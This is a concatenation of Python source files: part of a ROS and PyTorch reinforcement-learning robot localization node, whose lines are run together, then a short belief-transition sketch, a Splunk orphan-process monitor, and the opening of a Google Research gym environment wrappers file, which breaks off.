self.args.verbose>1: print("back_prop") self.Ret = torch.zeros(1,1).detach() self.values.append(self.Ret) if self.args.verbose > 2: print ("values:", len(self.values)) print ("rewards:", len(self.rewards)) print ("log_probs:", len(self.log_probs)) policy_loss = 0 value_loss = 0 gae = torch.zeros(1,1).detach() #Generalized advantage estimate #gae = 0 for i in reversed(range(len(self.rewards))): self.Ret = self.gamma * self.Ret + self.rewards[i] advantage = self.Ret - self.values[i] value_loss = value_loss + 0.5 * advantage.pow(2) #Generalized advantage estimate delta_t = self.rewards[i] \ + self.gamma * self.values[i+1].data\ - self.values[i].data gae = gae * self.gamma * self.tau + delta_t policy_loss = policy_loss - self.log_probs[i] * gae - self.entropy_coef * self.entropies[i] #R = self.gamma * R + self.rewards[i] + self.args.lamda * self.intri_rewards[i] #advantage = R - self.values[i] #value_loss = value_loss + 0.5 * advantage.pow(2) #delta_t = self.rewards[i] + self.args.lamda * self.intri_rewards[i].data + self.gamma * self.values[i + 1].data - self.values[i].data #gae = gae * self.gamma * self.tau + delta_t #policy_loss = policy_loss - self.log_probs[i] * Variable(gae) - self.entropy_coef * self.entropies[i] ### for logging purpose ### self.loss_policy = policy_loss.item() self.loss_value = value_loss.item() ### ### self.optimizer.zero_grad() total_loss = policy_loss + self.args.value_loss_coeff * value_loss (policy_loss + self.args.value_loss_coeff * value_loss).backward(retain_graph=True) torch.nn.utils.clip_grad_norm(self.policy_model.parameters(), self.max_grad_norm) # print ('bp grad value') # print (self.optimizer.param_groups[0]['params'][0]) if self.args.schedule_rl: self.scheduler_rl.step() self.optimizer.step() if self.args.verbose>0: print ("back_prop (RL) done") self.rl_backprop_cnt += 1 if self.rl_backprop_cnt % self.args.mdl_save_freq == 0 and self.args.update_rl and self.args.save: torch.save(self.policy_model.state_dict(), self.rl_filepath) print ('RL model saved at %s.'%self.rl_filepath) def back_prop_pm(self): if self.args.update_pm_by=="GTL" or self.args.update_pm_by=="BOTH": self.optimizer_pm.zero_grad() (sum(self.loss_likelihood)/float(len(self.loss_likelihood))).backward(retain_graph = True) self.optimizer_pm.step() mean_test_loss = sum(self.loss_likelihood).item() if self.args.schedule_pm: # self.scheduler_pm.step(mean_test_loss) self.scheduler_pm.step() self.pm_backprop_cnt += 1 if self.args.save and self.pm_backprop_cnt % self.args.mdl_save_freq == 0: torch.save(self.perceptual_model.state_dict(), self.pm_filepath) print ('perceptual model saved at %s.'%self.pm_filepath) else: return if self.args.verbose>0: print ("back_prop_pm done") def next_step(self): if self.args.verbose>1: print ("next_step") self.step_count += 1 if self.step_count >= self.step_max: self.next_ep() else: self.current_state = "update_likelihood" # if self.step_count % 10 == 0: # torch.cuda.empty_cache() torch.cuda.empty_cache() if self.args.verbose>2: print ("max mem alloc", int(torch.cuda.max_memory_allocated()*1e-6)) print ("max mem cache", int(torch.cuda.max_memory_cached()*1e-6)) print ("mem alloc", int(torch.cuda.memory_allocated()*1e-6)) print ("mem cache", int(torch.cuda.memory_cached()*1e-6)) def next_ep(self): if not self.rl_test: self.back_prop() self.flush_all() # self.save_tflogs() torch.cuda.empty_cache() if self.args.figure: self.ax_rew.clear() self.obj_rew = None if self.args.verbose>1: print ("next_ep") # if self.args.verbose > 0: # self.report_status(end_episode=True) 
self.action_from_policy = -1 self.action_idx = -1 self.bel_list = [] self.step_count = 0 self.collision = False # reset belief too self.belief[:,:,:]=1.0 self.belief /= self.belief.sum()#np.sum(self.belief, dtype=float) self.bel_ent = (self.belief * torch.log(self.belief)).sum().detach() self.prior = self.belief.detach().cpu().numpy() self.acc_epi_cnt +=1 self.episode_count += 1 if self.episode_count in range(self.episode_max - self.args.test_ep, self.episode_max): self.rl_test = True else: self.rl_test = False if self.episode_count == self.episode_max: self.next_env() else: self.current_state = "new_pose" def next_env(self): if self.args.verbose>1: print ("next_env") # if not self.rl_test: # self.back_prop() self.episode_count = 0 self.env_count += 1 if self.env_count == self.env_max: self.wrap_up() exit() else: self.current_state = "new_env_pose" def flush_all(self): # reset for back_prop self.loss_policy = 0 self.loss_value = 0 self.values = [] self.log_probs = [] self.rewards = [] self.manhattans=[] self.xyerrs=[] self.intri_rewards = [] self.reward = 0 self.entropies = [] def wrap_up(self): if self.args.save: if self.args.verbose > -1: print ('output saved at %s'%self.log_filepath) # save parameters if self.args.update_pm_by != "NONE": torch.save(self.perceptual_model.state_dict(), self.pm_filepath) print ('perceptual model saved at %s.'%self.pm_filepath) if self.args.update_rl: torch.save(self.policy_model.state_dict(), self.rl_filepath) print ('RL model saved at %s.'%self.rl_filepath) if self.args.update_ir: torch.save(self.intri_model.state_dict(), self.ir_filepath) print ('Intrinsic reward model saved at %s.'%self.ir_filepath) #Later to restore: # model.load_state_dict(torch.load(filepath)) # model.eval() if self.args.verbose > -1: print ('training took %s'%(time.time()-self.start_time)) def save_tflogs(self): if self.args.tflog == True: #Log scalar values info = { 'policy_loss': self.loss_policy, 'value_loss': self.loss_value, 'pol-val weighted loss': self.loss_policy+self.args.value_loss_coeff*self.loss_value, 'discounted_reward': self.Ret.item(), 'total_reward': (np.float_(sum(self.rewards))).item(), 'likelihood_loss': self.loss_likelihood.item() } for tag, value in info.items(): logger.scalar_summary(tag, value, self.episode_count) #Log values and gradients of the params (histogram summary) if self.args.update_rl: for tag, value in self.policy_model.named_parameters(): tag = tag.replace('.', '/') logger.histo_summary(tag, value.data.cpu().numpy(), self.episode_count) logger.histo_summary(tag+'/policy_grad', value.grad.data.cpu().numpy(), self.episode_count) if self.args.update_pm_by!="NONE": for tag, value in self.perceptual_model.named_parameters(): tag = tag.replace('.', '/') logger.histo_summary(tag, value.data.cpu().numpy(), self.episode_count) logger.histo_summary(tag+'/perceptual_grad', value.grad.data.cpu().numpy(), self.episode_count) if self.args.update_ir: for tag, value in self.intri_model.named_parameters(): tag = tag.replace('.', '/') logger.histo_summary(tag, value.data.cpu().numpy(), self.episode_count) logger.histo_summary(tag+'/intri_grad', value.grad.data.cpu().numpy(), self.episode_count) def cb_active(self): rospy.loginfo("Goal pose is now being processed by the Action Server...") def cb_feedback(self, feedback): #To print current pose at each feedback: #rospy.loginfo("Feedback for goal "+str(self.goal_cnt)+": "+str(feedback)) #rospy.loginfo("Feedback for goal pose received: " + str(feedback)) pass def cb_done(self, status, result): # Reference for terminal 
status values: http://docs.ros.org/diamondback/api/actionlib_msgs/html/msg/GoalStatus.html if status == 2: rospy.loginfo("Goal pose received a cancel request after it started executing, completed execution!") self.move_result_OK = False if status == 3: rospy.loginfo("Goal pose reached") self.move_result_OK = True if status == 4: rospy.loginfo("Goal pose was aborted by the Action Server") self.move_result_OK = False if status == 5: rospy.loginfo("Goal pose has been rejected by the Action Server") self.move_result_OK = False if status == 8: rospy.loginfo("Goal pose received a cancel request before it started executing, successfully cancelled!") self.move_result_OK = False self.wait_for_move = False return def movebase_client(self): goal = MoveBaseGoal() goal.target_pose.header.frame_id = "map" goal.target_pose.header.stamp = rospy.Time.now() goal.target_pose.pose.position.x = -self.goal_pose.y goal.target_pose.pose.position.y = self.goal_pose.x q_goal = quaternion_from_euler(0,0, wrap(self.goal_pose.theta+np.pi*0.5)) goal.target_pose.pose.orientation.x = q_goal[0] goal.target_pose.pose.orientation.y = q_goal[1] goal.target_pose.pose.orientation.z = q_goal[2] goal.target_pose.pose.orientation.w = q_goal[3] rospy.loginfo("Sending goal pose to Action Server") rospy.loginfo(str(goal)) self.wait_for_move = True self.client.send_goal(goal, self.cb_done, self.cb_active, self.cb_feedback) def prep_jay(self): # load map, init variables, etc. self.clear_objects() self.read_map() self.make_low_dim_maps() if self.args.gtl_off == False: # generate synthetic scan data over the map (and directions) self.get_synth_scan_mp(self.scans_over_map, map_img=self.map_for_LM, xlim=self.xlim, ylim=self.ylim) self.reset_explored() self.update_current_pose_from_robot() self.update_true_grid() self.sync_goal_to_true_grid() if self.args.figure==True: self.update_figure(newmap=True) def loop_jay(self, timer_ev): if self.fsm_state == "init": # prep jay self.prep_jay() self.fsm_state = "new_episode" if self.args.verbose >= 1: print ("[INIT] prep_jay done") return elif self.fsm_state == "sense": # wait for scan self.scan_once = True self.scan_bottom_once = True self.fsm_state = "sensing" # if self.args.verbose >= 1: # print ("[SENSE] Wait for scan.") self.mark_time = time.time() return elif self.fsm_state == "sensing": if self.scan_ready: self.scan_ready = False if self.scan_cnt > 10: self.scan_cnt = 0 self.fsm_state = "localize" if self.args.verbose >= 1: print ("[SENSING DONE]") print ("[TIME for SENSING] %.3f sec"%(time.time()-self.mark_time)) else: if self.scan_cnt == 0: self.saved_ranges = np.array(self.raw_scan.ranges) else: self.saved_ranges = np.min( np.stack( (self.saved_ranges, np.array(self.raw_scan.ranges)), axis = 0), axis = 0) self.scan_cnt += 1 self.fsm_state = "sense" return elif self.fsm_state == "localize": if self.args.verbose >= 1: print ("[LOCALIZE]") # process lidar data # self.get_lidar() time_mark = time.time() self.do_scan_2d_n_headings() print ("[TIME for SCAN TO 2D IMAGE] %.3f sec"%(time.time()-time_mark)) self.slide_scan() # do localization and action sampling self.update_explored() time_mark = time.time() self.compute_gtl(self.scans_over_map) print ("[TIME for GTL] %.2f sec"%(time.time()-time_mark)) time_mark = time.time() self.likelihood = self.update_likelihood_rotate(self.map_for_LM, self.scan_2d) print ("[TIME for LM] %.2f sec"%(time.time()-time_mark)) # if self.collision == False: self.product_belief() self.update_believed_pose() self.update_map_T_odom() self.update_bel_list() 
self.get_reward() time_mark = time.time() if self.args.verbose>0: self.report_status(end_episode=False) if self.args.figure: self.update_figure() if self.save_roll_out: self.collect_data() print ("logging, saving, figures: %.2f sec"%(time.time()-time_mark)) if self.step_count >= self.step_max-1: self.fsm_state = "end_episode" if self.args.random_policy: fwd_collision = self.collision_fnc(0, 0, 0, self.scan_2d_slide) if fwd_collision: num_actions = 2 else: num_actions = 3 self.action_from_policy = np.random.randint(num_actions) self.action_str = self.action_space[self.action_from_policy] else: self.get_action() else: self.fsm_state = "decide" elif self.fsm_state == "decide": # decide move if self.args.verbose >= 1: print ("[Sample Action]") self.run_action_module() if self.skip_to_end: self.skip_to_end = False self.fsm_state = "end_episode" return self.update_target_pose() self.fsm_state = "move" elif self.fsm_state == "move": if self.args.verbose >= 1: print ("[MOVE]") # do motion control self.collision_check() if self.collision: rospy.logwarn("Front is not clear. Abort action.") self.fsm_state = "end_step" else: if self.args.use_movebase: self.movebase_client() else: self.init_motion_control() self.fsm_state = "moving" self.mark_time = time.time() self.wait_for_move = True self.scan_on = True if self.args.verbose >= 1: print ("[MOVING]") elif self.fsm_state == "moving": if not self.args.use_movebase: self.wait_for_move = self.do_motion_control() if self.wait_for_move == False: self.fsm_state = "trans-belief" self.scan_on = False if self.args.verbose >= 1: print ("[DONE MOVING]") print ("[TIME for MOTION] %.3f sec"%(time.time()-self.mark_time)) elif self.fsm_state == "trans-belief": if self.args.verbose >= 1: print ("[TRANS-BELIEF]") self.transit_belief() self.fsm_state = "update_true_pose" elif self.fsm_state == "update_true_pose": self.update_current_pose_from_robot() self.update_true_grid() self.fsm_state = "end_step" elif self.fsm_state == "end_step": self.step_count += 1 # end of step self.fsm_state = "sense" elif self.fsm_state == "end_episode": self.end_episode() if self.episode_count >= self.episode_max: rospy.loginfo("Max episode "+str(self.episode_count)+" reached.") self.quit_sequence() # and quit. 
else: self.fsm_state = "new_episode" elif self.fsm_state == "new_episode": self.new_episode() self.fsm_state = "spawn" elif self.fsm_state == "spawn": if self.wait_for_move == False: self.fsm_state = "sense" self.scan_on = False if self.args.verbose >= 1: print ("[DONE MOVING]") self.update_current_pose_from_robot() self.update_true_grid() else: print (self.fsm_state) rospy.logerr("Unknown FSM state") rospy.signal_shutdown("Unknown FSM state") exit() return def end_episode(self): if self.args.verbose > 0: print ("[END EPISODE]") if not self.rl_test: self.back_prop() self.flush_all() if self.args.figure: self.ax_rew.clear() self.obj_rew = None self.acc_epi_cnt +=1 self.episode_count += 1 def new_episode(self): if self.args.verbose > 0: print ("[NEW EPISODE]") self.action_from_policy = -1 self.action_idx = -1 self.bel_list = [] self.step_count = 0 self.scan_cnt = 0 self.collision = False # reset belief too self.belief[:,:,:]=1.0 self.belief /= self.belief.sum()#np.sum(self.belief, dtype=float) self.bel_ent = (self.belief * torch.log(self.belief)).sum().detach() self.prior = self.belief.detach().cpu().numpy() if self.args.load_init_poses=="none" and self.episode_count==0: cnt = 0 self.init_poses=np.zeros((self.episode_max,3),np.float32) while cnt < self.episode_max: self.sample_a_pose() self.init_poses[cnt,0] = self.goal_pose.x self.init_poses[cnt,1] = self.goal_pose.y self.init_poses[cnt,2] = self.goal_pose.theta cnt += 1 if self.args.save: np.save(os.path.join(self.data_path, 'init_poses.npy'), self.init_poses) print (os.path.join(self.data_path, 'init_poses.npy')) print ("sample init poses: done") print (self.init_poses) # load it from saved poses elif self.episode_count == 0: self.init_poses = np.load(self.args.load_init_poses) self.goal_pose.x = to_real(to_index(self.init_poses[self.episode_count, 0], self.grid_rows, self.xlim), self.xlim, self.grid_rows) self.goal_pose.y = to_real(to_index(self.init_poses[self.episode_count, 1], self.grid_cols, self.ylim), self.ylim, self.grid_cols) self.goal_pose.theta = self.init_poses[self.episode_count, 2] # move_base() self.movebase_client() self.save_roll_out = self.args.save & np.random.choice([False, True], p=[1.0-self.args.prob_roll_out, self.args.prob_roll_out]) if self.save_roll_out: #save roll-out for next episode. self.roll_out_filepath = os.path.join(self.log_dir, 'roll-out-%03d-%03d.txt'%(self.env_count,self.episode_count)) def cbScanTop(self, laser_scan_stuff): # print("got in cbScan") # if self.wait_for_scan: if self.scan_on or self.scan_once: self.raw_scan = laser_scan_stuff self.get_lidar() # ? 
self.scan_ready = True self.scan_once = False # self.wait_for_scan = False return def cbScanBottom(self, laser_scan_stuff): # print("got in cbScan") # if self.wait_for_scan: if self.scan_on or self.scan_bottom_once: self.raw_scan_bottom = laser_scan_stuff self.get_lidar_bottom() self.scan_bottom_ready = True self.scan_bottom_once = False return def cbRobotPose(self, robot_pose): self.live_pose.x = robot_pose.pose.position.y self.live_pose.y = - robot_pose.pose.position.x q_robot = [None]*4 q_robot[0] = robot_pose.pose.orientation.x q_robot[1] = robot_pose.pose.orientation.y q_robot[2] = robot_pose.pose.orientation.z q_robot[3] = robot_pose.pose.orientation.w q_rot = quaternion_from_euler(0,0, -np.pi*.5) robot_ori = quaternion_multiply(q_rot, q_robot) roll,pitch,yaw = euler_from_quaternion(robot_ori) self.live_pose.theta = yaw self.robot_pose_ready = True return def cbOdom(self, odom): qtn=odom.pose.pose.orientation q_odom = [None]*4 q_odom[0] = qtn.x q_odom[1] = qtn.y q_odom[2] = qtn.z q_odom[3] = qtn.w roll,pitch,yaw=euler_from_quaternion(q_odom) #qtn.w, qtn.x, qtn.y, qtn.z) self.odom_pose.x = odom.pose.pose.position.x self.odom_pose.y = odom.pose.pose.position.y self.odom_pose.theta = yaw def onShutdown(self): rospy.loginfo("[LocalizationNode] Shutdown.") def loginfo(self, s): rospy.loginfo('[%s] %s' % (self.node_name, s)) if __name__ == '__main__': #str_date = datetime.datetime.today().strftime('%Y-%m-%d') parser = argparse.ArgumentParser() ## GENERAL parser.add_argument("-c", "--comment", help="your comment", type=str, default='') parser.add_argument("--gazebo", "-gz", action="store_true") parser.add_argument("--jay1", "-j1", action="store_true") parser.add_argument("--use-movebase", action="store_true") parser.add_argument("--save-loc", type=str, default=os.environ['TB3_LOG']) #"tb3_anl/logs") parser.add_argument("--generate-data", action="store_true") parser.add_argument("--n-workers", "-nw", type=int, default=multiprocessing.cpu_count()) parser.add_argument("--load-init-poses", type=str, default="none") ## COLLISION parser.add_argument("--collision-radius", "-cr", type=float, default=0.25) parser.add_argument("--collision-from", type=str, choices=['none','map','scan'], default='map') ## MAPS, EPISODES, MOTIONS parser.add_argument("-n", "--num", help = "num envs, episodes, steps", nargs=3, default=[1,10, 10], type=int) parser.add_argument("--load-map", help = "load an actual map", type=str, default=None) parser.add_argument("--distort-map", action="store_true") parser.add_argument("--flip-map", help = "flip n pixels 0 <--> 1 in map image", type=int, default=0) parser.add_argument("--load-map-LM", help = "load an actual map for LM target", type=str, default=None) parser.add_argument("--load-map-RL", help = "load an actual map for RL state", type=str, default=None) parser.add_argument("--map-pixel", help = "size of a map pixel in real world (meters)", type=float, default=6.0/224.0) #parser.add_argument("--maze-grids-range", type=int, nargs=2, default=[None, None]) parser.add_argument("--n-maze-grids", type=int, nargs='+', default=[5,11]) parser.add_argument("--n-local-grids", type=int, default=11) parser.add_argument("--n-state-grids", type=int, default=11) parser.add_argument("--n-state-dirs", type=int, default=4) parser.add_argument("--RL-type", type=int, default=0, choices=[0,1,2]) # 0: original[map+scan+bel], 1: no map[scan+bel], 2:extended[bel+lik+hd-scan+hd-map] parser.add_argument("--n-lm-grids", type=int, default=11) parser.add_argument("-sr", "--sub-resolution", type=int, 
default=1) parser.add_argument("--n-headings", "-nh", type=int, default=4) parser.add_argument("--rm-cells", help="num of cells to delete from maze", type=int, default=11) parser.add_argument("--random-rm-cells", type=int, nargs=2, default=[0,0]) parser.add_argument("--backward-compatible-maps","-bcm", action="store_true") parser.add_argument("--random-thickness", action="store_true") parser.add_argument("--thickness", type=float, default=None) parser.add_argument("--save-boundary", type=str, choices=['y','n','r'], default='y') ## Error Sources: ## 1. initial pose - uniform pdf ## 2. odometry (or control) - gaussian pdf ## 3. use scenario: no error or init error + odom error accumulation parser.add_argument("-ie", "--init-error", type=str, choices=['NONE','XY','THETA','BOTH'],default='NONE') parser.add_argument("-pe", "--process-error", type=float, nargs=2, default=[0,0]) parser.add_argument("--fov", help="angles in (fov[0], fov[1]) to be removed", type=float, nargs=2, default=[0, 0]) parser.add_argument("--lidar-noise", help="number of random noisy rays in a scan", type=int, default=0) parser.add_argument("--lidar-sigma", help="sigma for lidar (1d) range", type=float, default=0) parser.add_argument("--scan-range", help="[min, max] scan range (m)", type=float, nargs=2, default=[0.10, 3.5]) ## VISUALIZE INFORMATION parser.add_argument("-v", "--verbose", help="increase output verbosity", type=int, default=0, nargs='?', const=1) parser.add_argument("-t", "--timer", help="timer period (sec) default 0.1", type=float, default=0.1) parser.add_argument("-f", "--figure", help="show figures", action="store_true") parser.add_argument("--figure-save-freq", "-fsf", type=int, default=1) # parser.add_argument("-p", "--print-map", help="print map", action="store_true") ## GPU parser.add_argument("-ug", "--use-gpu", action="store_true") parser.add_argument("-sg", "--set-gpu", help="set cuda visible devices, default none", type=int, default=[],nargs='+') ## MOTION(PROCESS) MODEL parser.add_argument('--trans-belief', help='select how to fill after transition', choices=['shift','roll','stoch-shift'], default='stoch-shift', type=str) parser.add_argument("--fwd-step", "-fs", type=int, default=1) parser.add_argument("--rot-step", "-rs", type=int, default=1) parser.add_argument("--sigma-xy", "-sxy", type=float, default=.5) ## RL-GENERAL parser.add_argument('--update-rl', dest='update_rl', action='store_true') parser.add_argument('--no-update-rl', dest='update_rl',help="don't update AC model", action="store_false") parser.add_argument('--update-ir', dest='update_ir', action='store_true') parser.add_argument('--no-update-ir', dest='update_ir',help="don't update IR model", action="store_false") parser.set_defaults(update_rl=False, update_ir=False) parser.add_argument('--random-policy', action='store_true') parser.add_argument('--markov', action='store_true') ## RL-STATE parser.add_argument('--binary-scan', action='store_true') ## RL-ACTION parser.add_argument("--manual-control","-mc", action="store_true") parser.add_argument('--num-actions', type=int, default=3) parser.add_argument('--test-ep', help='number of test episode at the end of each env', type=int, default=0) parser.add_argument('-a','--action', help='select action : argmax or multinomial', choices=['argmax','multinomial'], default='multinomial', type=str) ## RL-PARAMS parser.add_argument('-lam', '--lamda', help="weight for intrinsic reward, default=0.7", type=float, default=0.7) parser.add_argument('-vlcoeff', '--value_loss_coeff', help="value loss 
coefficient, default=1.0", type=float, default=1.0) parser.add_argument('-lr', '--lrrl', help="lr for RL (1e-4)", type=float, default=1e-4) parser.add_argument('-cent', '--c-entropy', help="coefficient of entropy in policy loss (0.001)", type=float, default=0.001) ## REWARD # parser.add_argument('--block-penalty', dest='penalty_for_block', help="penalize for blocked fwd", action="store_true") parser.add_argument('--block-penalty', dest='penalty_for_block', help="penalize for blocked fwd", type=float, default=0) parser.add_argument('--rew-explore', help="reward for exploration", action="store_true") parser.add_argument('--rew-bel-new', help='reward for new belief pose', action="store_true") parser.add_argument('--rew-bel-ent', help="reward for low entropy in belief", action="store_true") parser.add_argument('--rew-infogain', help="reward for info gain", action="store_true") parser.add_argument('--rew-bel-gt-nonlog', help="reward for correct belief", action="store_true") parser.add_argument('--rew-bel-gt', help="reward for correct belief", action="store_true") parser.add_argument('--rew-KL-bel-gt', help="reward for increasing belief at gt pose", action="store_true") parser.add_argument('--rew-dist', help="reward for distance", action="store_true") parser.add_argument('--rew-hit', help="reward for distance being 0", action="store_true") parser.add_argument('--rew-inv-dist', help="r=1/(1+d)", action="store_true") ## TRUE LIKELIHOOD parser.add_argument("--gtl-src", help="source of GTL", choices=['hd-cos','hd-corr','hd-corr-clip'], default='hd-cos') parser.add_argument("--gtl-output", choices=['softmax','softermax','linear'], default='softmax') parser.add_argument("-go", "--gtl-off", action="store_true") ## LM-GENERAL parser.add_argument("-temp", "--temperature", help="softmax temperature", type=float, default=1.0) parser.add_argument('--pm-net', help ="select PM network", choices = ['none', 'densenet121', 'densenet169', 'densenet201', 'densenet161', 'resnet18', 'resnet50', 'resnet101', 'resnet152', 'resnet18s', 'resnet50s', 'resnet101s', 'resnet152s'], default='none') parser.add_argument('--pm-loss', choices=['L1','KL'], default='KL') parser.add_argument('--pm-scan-step', type=int, default=1) parser.add_argument('--shade', dest="shade", help="shade for scan image", action="store_true") parser.add_argument('--no-shade', dest="shade", help="no shade for scan image", action="store_false") parser.set_defaults(shade=False) parser.add_argument('--pm-batch-size', '-pbs', help='batch size of pm model.', default=10, type=int) parser.add_argument("-ugl", "--use-gt-likelihood", help="PM = ground truth likelihood", action="store_true") parser.add_argument("--mask", action="store_true", help='mask likelihood with obstacle info') parser.add_argument("-ch3","--ch3", choices=['NONE','RAND','ZERO'], type=str, default='NONE') parser.add_argument("--n-pre-classes", "-npc", type=int, default=None) parser.add_argument("--schedule-pm", action="store_true") parser.add_argument("--schedule-rl", action="store_true") parser.add_argument("--pm-step-size", type=int, default=250) parser.add_argument("--rl-step-size", type=int, default=250) parser.add_argument("--pm-decay", type=float, default=0.1) parser.add_argument("--rl-decay", type=float, default=0.1) parser.add_argument("--drop-rate", type=float, default=0.0) ## LM-PARAMS parser.add_argument('-lp', '--lrpm', help="lr for PM (1e-5)", type=float, default=1e-5) parser.add_argument('-upm', '--update-pm-by', help="train PM with GTL,RL,both, none", choices = 
['GTL','RL','BOTH','NONE'], default='NONE', type=str) ## LOGGING parser.add_argument('-ln', "--tflogs-name", help="experiment name to append to the tensor board log files", type=str, default=None) parser.add_argument('-tf', '--tflog', dest="tflog",help="tensor board log True/False", action="store_true") parser.add_argument('-ntf', '--no-tflog', dest="tflog",help="tensor board log True/False", action="store_false") parser.set_defaults(tflog=False) parser.add_argument('--save', help="save logs and models", action="store_true", dest='save') parser.add_argument('--no-save', help="don't save any logs or models", action="store_false", dest='save') parser.set_defaults(save=True) parser.add_argument('-pro', '--prob-roll-out', help="sample probability for roll out (0.01)", type=float, default=0.00) parser.add_argument('--mdl-save-freq', type=int, default=1) ## LOADING MODELS/DATA parser.add_argument('--pm-model', help="perceptual model path and file", type=str, default=None) parser.add_argument('--use-pretrained', action='store_true') parser.add_argument('--rl-model', help="RL model path and file", type=str, default=None) parser.add_argument('--ir-model', help="intrinsic reward model path and file", type=str, default=None) parser.add_argument('--test-mode', action="store_true") parser.add_argument('--test-data-path', type=str, default='') parser.add_argument('--ports', type=str, default='') args = parser.parse_args() # if args.suppress_fig: # import matplotlib as mpl # mpl.use('Agg') if 360%args.pm_scan_step !=0 or args.pm_scan_step <=0 or args.pm_scan_step > 360: raise Exception('pm-scan-step should be in [1, 360]') if args.pm_model is not None: if os.path.islink(args.pm_model): args.pm_model = os.path.realpath(args.pm_model) if args.rl_model is not None: if os.path.islink(args.rl_model): args.rl_model = os.path.realpath(args.rl_model) print (args) if len(args.set_gpu)>0: os.environ["CUDA_VISIBLE_DEVICES"]=','.join(str(x) for x in args.set_gpu) # while(1): localizer.loop() if args.jay1 or args.gazebo: rospy.init_node('DAL', anonymous=False) localizer = LocalizationNode(args) rospy.on_shutdown(localizer.onShutdown) rospy.spin() else: localizer = LocalizationNode(args) while(1): localizer.loop()
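
The trans_bel method in the script above implements the motion update of the histogram filter: a turn is a roll of the belief along the heading axis, and a forward step is a per-heading planar shift with the vacated cells filled by a flat prior. A minimal standalone sketch of that idea follows; the function and argument names are illustrative, and it omits the script's stochastic smoothing and Gaussian blur.

import numpy as np

def transit_belief(bel, action, rot_step=1, fwd_step=1):
    """Minimal belief-transition sketch over a (headings, rows, cols) grid."""
    bel = bel.copy()
    n_head, rows, cols = bel.shape
    if action == 'turn_right':
        bel = np.roll(bel, -rot_step, axis=0)
    elif action == 'turn_left':
        bel = np.roll(bel, rot_step, axis=0)
    elif action == 'go_fwd':
        fill = bel.min()
        for i in range(n_head):
            theta = 2 * np.pi * i / n_head
            dr = int(round(fwd_step * np.cos(theta + np.pi)))  # row shift
            dc = int(round(fwd_step * np.sin(theta + np.pi)))  # column shift
            shifted = np.full((rows, cols), fill, dtype=bel.dtype)
            r0, r1 = max(0, dr), min(rows, rows + dr)
            c0, c1 = max(0, dc), min(cols, cols + dc)
            shifted[r0:r1, c0:c1] = bel[i, r0 - dr:r1 - dr, c0 - dc:c1 - dc]
            bel[i] = shifted
    return bel / bel.sum()

# e.g. a uniform belief over 4 headings on an 11x11 grid:
# bel = np.full((4, 11, 11), 1.0 / (4 * 11 * 11))
# bel = transit_belief(bel, 'go_fwd')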
orphan_process_monitor.py
# Copyright 2016 Splunk, Inc.
#
# Licensed under the Apache License, Version 2.0 (the 'License'): you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an 'AS IS' BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.

'''
Orphan process monitor.
'''

import os
import threading
import time

__all__ = ['OrphanProcessChecker', 'OrphanProcessMonitor']


class OrphanProcessChecker(object):
    '''Orphan process checker.

    Only works for the Linux platform. On Windows, is_orphan is always
    False and there is no need to do this monitoring.

    :param callback: (optional) Callback for orphan process.
    :type callback: ``function``
    '''

    def __init__(self, callback=None):
        if os.name == 'nt':
            self._ppid = 0
        else:
            self._ppid = os.getppid()
        self._callback = callback

    def is_orphan(self):
        '''Check whether the process is an orphan.

        For the Windows platform just return False.

        :returns: True for orphan process else False
        :rtype: ``bool``
        '''
        if os.name == 'nt':
            return False
        return self._ppid != os.getppid()

    def check_orphan(self):
        '''Check if the process has become an orphan.

        If the process has become an orphan, call the callback function
        to handle it properly.

        :returns: True for orphan process else False
        :rtype: ``bool``
        '''
        res = self.is_orphan()
        if res and self._callback:
            self._callback()
        return res


class OrphanProcessMonitor(object):
    '''Orphan process monitor.

    Check in a background thread, once per interval, whether the process has
    become an orphan, and call the callback if it has.

    :param callback: Callback for orphan process monitor.
    :type callback: ``function``
    :param interval: (optional) Interval to monitor.
    :type interval: ``integer``
    '''

    def __init__(self, callback, interval=1):
        self._checker = OrphanProcessChecker(callback)
        self._thr = threading.Thread(target=self._do_monitor)
        self._thr.daemon = True
        self._started = False
        self._interval = interval

    def start(self):
        '''
        Start orphan process monitor.
        '''
        if self._started:
            return
        self._started = True
        self._thr.start()

    def stop(self):
        '''
        Stop orphan process monitor.
        '''
        joinable = self._started
        self._started = False
        if joinable:
            self._thr.join(timeout=1)

    def _do_monitor(self):
        while self._started:
            if self._checker.check_orphan():
                break
            for _ in range(self._interval):
                if not self._started:
                    break
                time.sleep(1)
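
A minimal usage sketch for the monitor above, assuming the module is importable under its file name; the callback body and the bounded work loop are illustrative, not part of this module.

import time
from orphan_process_monitor import OrphanProcessMonitor

def on_orphaned():
    # Illustrative teardown hook: a real consumer would flush buffers and
    # stop its worker threads here before exiting.
    print('Parent process exited; shutting down.')

monitor = OrphanProcessMonitor(on_orphaned, interval=2)
monitor.start()
for _ in range(60):      # placeholder for the real work loop
    time.sleep(1)
monitor.stop()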
wrappers.py
# coding=utf-8 # Copyright 2020 The Google Research Authors. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """Wrappers for OpenAI Gym environments.""" from __future__ import absolute_import from __future__ import division from __future__ import print_function import atexit import functools import multiprocessing import sys import traceback import gym import gym.spaces import numpy as np import tensorflow.compat.v1 as tf class AttributeModifier(object): """Provides getter and setter functions to access wrapped environments.""" def __getattr__(self, name): return getattr(self._env, name) def set_attribute(self, name, value): """Set an attribute in the wrapped environment. Args: name: Attribute to access. value: New attribute value. """ set_attr = getattr(self._env, 'set_attribute', None) if callable(set_attr): self._env.set_attribute(name, value) else: setattr(self._env, name, value) class RangeNormalize(AttributeModifier): """Normalize the specialized observation and action ranges to [-1, 1].""" def __init__(self, env): self._env = env self._should_normalize_observ = self._is_finite(self._env.observation_space) if not self._should_normalize_observ: tf.logging.info('Not normalizing infinite observation range.') self._should_normalize_action = self._is_finite(self._env.action_space) if not self._should_normalize_action: tf.logging.info('Not normalizing infinite action range.') @property def observation_space(self): space = self._env.observation_space if not self._should_normalize_observ: return space return gym.spaces.Box( -np.ones(space.shape), np.ones(space.shape), dtype=np.float32) @property def 